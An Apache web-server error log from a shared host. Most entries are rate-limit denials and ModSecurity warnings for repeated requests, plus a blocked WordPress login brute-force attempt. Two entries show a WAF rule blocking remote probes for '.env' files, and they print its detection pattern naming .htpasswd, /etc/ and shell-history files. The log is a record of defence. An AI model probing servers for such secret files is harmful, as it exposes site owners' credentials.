[Tue May 26 19:54:28.905354 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQxwAAAGw
[Tue May 26 19:54:28.905971 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-uQAAAI0
[Tue May 26 19:54:28.905975 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-ugAAALY
[Tue May 26 19:54:28.915884 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQyAAAAEY
[Tue May 26 19:54:28.930795 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-uwAAAOc
[Tue May 26 19:54:28.931489 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-vAAAALQ
[Tue May 26 19:54:28.932812 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-vgAAAOs
[Tue May 26 19:54:28.933482 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-vQAAAOg
[Tue May 26 19:54:28.971815 2026] [proxy:error] [pid 86490:tid 86738] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:28.971880 2026] [proxy_http:error] [pid 86490:tid 86738] [client 142.248.80.176:60470] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:28.972475 2026] [proxy:error] [pid 86490:tid 86738] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:28.972507 2026] [proxy_http:error] [pid 86490:tid 86738] [client 142.248.80.176:60470] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:29.007243 2026] [qos:error] [pid 93868:tid 94307] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHUqK9k_ZUB2Vp25I8wAAAcA
[Tue May 26 19:54:29.057300 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHWDRMqfxdEDkoszQzgAAAGU
[Tue May 26 19:54:29.057326 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-xwAAAI0
[Tue May 26 19:54:29.057751 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-yAAAALY
[Tue May 26 19:54:29.061284 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-yQAAAOc
[Tue May 26 19:54:29.064022 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHWDRMqfxdEDkoszQ0AAAACk
[Tue May 26 19:54:29.081828 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-ygAAALQ
[Tue May 26 19:54:29.083151 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-ywAAAOg
[Tue May 26 19:54:29.083680 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-zAAAAOs
[Tue May 26 19:54:29.084448 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-zQAAAO8
[Tue May 26 19:54:29.156495 2026] [qos:error] [pid 93868:tid 94322] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHUqK9k_ZUB2Vp25I9QAAAc8
[Tue May 26 19:54:29.210430 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-0AAAANc
[Tue May 26 19:54:29.211441 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-0QAAAIU
[Tue May 26 19:54:29.213960 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHWDRMqfxdEDkoszQ0QAAABA
[Tue May 26 19:54:29.218400 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHWDRMqfxdEDkoszQ0gAAAAU
[Tue May 26 19:54:29.225155 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-0gAAAIo
[Tue May 26 19:54:29.234811 2026] [qos:error] [pid 86490:tid 86634] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-0wAAAJM
[Tue May 26 19:54:29.235238 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-1AAAAOw
[Tue May 26 19:54:29.236360 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-1QAAAI0
[Tue May 26 19:54:29.237248 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K-1gAAALY
[Tue May 26 19:54:29.276916 2026] [security2:error] [pid 86490:tid 86744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K-AgAAAQE"]
[Tue May 26 19:54:29.280719 2026] [security2:error] [pid 93868:tid 94282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHEqK9k_ZUB2Vp25I1AAAAac"]
[Tue May 26 19:54:29.288396 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQeQAAACQ"]
[Tue May 26 19:54:29.290455 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG0qK9k_ZUB2Vp25IxgAAAfA"]
[Tue May 26 19:54:29.293145 2026] [security2:error] [pid 93868:tid 94299] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHEqK9k_ZUB2Vp25I0wAAAbg"]
[Tue May 26 19:54:29.307833 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQiwAAAAc"]
[Tue May 26 19:54:29.308191 2026] [security2:error] [pid 93868:tid 94223] [remote 103.166.184.148:50254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.184.166.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25I9gABv2s"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:54:29.309581 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQjQAAAEI"]
[Tue May 26 19:54:29.321900 2026] [security2:error] [pid 86490:tid 86645] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K-EgAAAJ4"]
[Tue May 26 19:54:29.330857 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K-EAAAAO4"]
[Tue May 26 19:54:29.339974 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHGDRMqfxdEDkoszQsAAAAC4"]
[Tue May 26 19:54:29.345998 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHEqK9k_ZUB2Vp25I2AAAAZQ"]
[Tue May 26 19:54:29.348000 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHGDRMqfxdEDkoszQowAAAHU"]
[Tue May 26 19:54:29.351585 2026] [security2:error] [pid 86490:tid 86657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-TgAAAKo"]
[Tue May 26 19:54:29.352374 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K-CgAAAMc"]
[Tue May 26 19:54:29.356218 2026] [core:crit] [pid 86490:tid 86669] (13)Permission denied: [client 157.55.39.195:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:54:29.365814 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHEqK9k_ZUB2Vp25I1gAAAe0"]
[Tue May 26 19:54:29.372349 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K-EwAAAQQ"]
[Tue May 26 19:54:29.372997 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K-DAAAAKU"]
[Tue May 26 19:54:29.374731 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHGDRMqfxdEDkoszQrQAAAG0"]
[Tue May 26 19:54:29.398866 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHGDRMqfxdEDkoszQrgAAABI"]
[Tue May 26 19:54:29.408959 2026] [security2:error] [pid 86490:tid 86673] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K-FgAAALo"]
[Tue May 26 19:54:29.421717 2026] [security2:error] [pid 93868:tid 94382] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHEqK9k_ZUB2Vp25I4AAAAgs"]
[Tue May 26 19:54:29.421806 2026] [security2:error] [pid 86490:tid 86650] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-awAAAKM"]
[Tue May 26 19:54:29.422813 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-TwAAAJw"]
[Tue May 26 19:54:29.424455 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHGDRMqfxdEDkoszQqwAAAFo"]
[Tue May 26 19:54:29.425809 2026] [security2:error] [pid 86490:tid 86735] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/app2-static/.env"] [unique_id "ahWtHVZMwN0DpLVWo6K-5wAAAPg"]
[Tue May 26 19:54:29.436099 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-XQAAAL4"]
[Tue May 26 19:54:29.439951 2026] [security2:error] [pid 86490:tid 86729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-eAAAAPI"]
[Tue May 26 19:54:29.446289 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHGDRMqfxdEDkoszQqgAAAAY"]
[Tue May 26 19:54:29.446839 2026] [security2:error] [pid 86490:tid 86633] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-dwAAAJI"]
[Tue May 26 19:54:29.460096 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-fAAAAPU"]
[Tue May 26 19:54:29.460926 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHGDRMqfxdEDkoszQswAAAAk"]
[Tue May 26 19:54:29.462366 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-dgAAAMA"]
[Tue May 26 19:54:29.462564 2026] [security2:error] [pid 86490:tid 86712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-bgAAAOE"]
[Tue May 26 19:54:29.463441 2026] [security2:error] [pid 93868:tid 94342] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHEqK9k_ZUB2Vp25I4QAAAeM"]
[Tue May 26 19:54:29.464932 2026] [security2:error] [pid 86490:tid 86647] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-aAAAAKA"]
[Tue May 26 19:54:29.466702 2026] [security2:error] [pid 86490:tid 86638] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-bQAAAJc"]
[Tue May 26 19:54:29.600587 2026] [qos:error] [pid 86490:tid 86663] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_HgAAALA
[Tue May 26 19:54:29.601885 2026] [qos:error] [pid 93868:tid 94370] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtHUqK9k_ZUB2Vp25JEwAAAf8
[Tue May 26 19:54:29.604372 2026] [qos:error] [pid 93868:tid 94308] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtHUqK9k_ZUB2Vp25JFAAAAcE
[Tue May 26 19:54:29.615034 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHWDRMqfxdEDkoszQ6AAAACU
[Tue May 26 19:54:29.615512 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_HwAAAJE
[Tue May 26 19:54:29.616185 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_IAAAAJE
[Tue May 26 19:54:29.618530 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_IQAAAPs
[Tue May 26 19:54:29.618953 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_IgAAAJc
[Tue May 26 19:54:29.620679 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_IwAAAN8
[Tue May 26 19:54:29.630566 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_JAAAANk
[Tue May 26 19:54:29.752477 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_JgAAAQM
[Tue May 26 19:54:29.755889 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_JwAAAMI
[Tue May 26 19:54:29.761130 2026] [security2:error] [pid 86490:tid 86734] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/examples/web/.env"] [unique_id "ahWtHVZMwN0DpLVWo6K_KAAAAPc"]
[Tue May 26 19:54:29.766991 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_KQAAAJE
[Tue May 26 19:54:29.767635 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHWDRMqfxdEDkoszQ6QAAAE4
[Tue May 26 19:54:29.767798 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_KgAAAJE
[Tue May 26 19:54:29.768555 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_KwAAAPs
[Tue May 26 19:54:29.769439 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_LAAAAJc
[Tue May 26 19:54:29.771877 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_LQAAAN8
